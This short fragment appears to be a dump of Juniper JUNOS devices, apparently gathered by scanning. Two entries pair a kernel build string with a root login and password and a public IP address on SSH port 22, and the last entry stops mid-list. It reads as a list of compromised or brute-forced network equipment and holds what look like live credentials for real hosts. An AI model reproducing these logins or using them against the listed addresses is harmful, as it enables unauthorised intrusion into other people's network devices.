11.4R8.5 JUNOS 11.4R8.5 #0: 2013-05-28 22:40:08 UTC builder@singlath:/volume/build/junos/11.4/release/11.4R8.5/obj-powerpc/bsd/kernels/JUNIPER-EX/kernel powerpc root:root1234 202.82.151.65 port: 22 --> JUNOS 12.1R4.7 JUNOS 12.1R4.7 #0: 2012-10-24 21:55:39 UTC builder@briath.juniper.net:/volume/build/junos/12.1/release/12.1R4.7/obj-octeon/junos/bsd/kernels/JSRXNLE/kernel octeon root:root123 59.34.58.55 port: 22 --> JUNOS SRX-210 11.4R9.4 JUNOS 11.4R9.4 #0: 2013-08-22 06:58:13 UTC builder@singlath:/volume/build/junos/11.4/release/11.4R9.4/obj-octeon/bsd/kernels/JSRXNLE/kernel octeon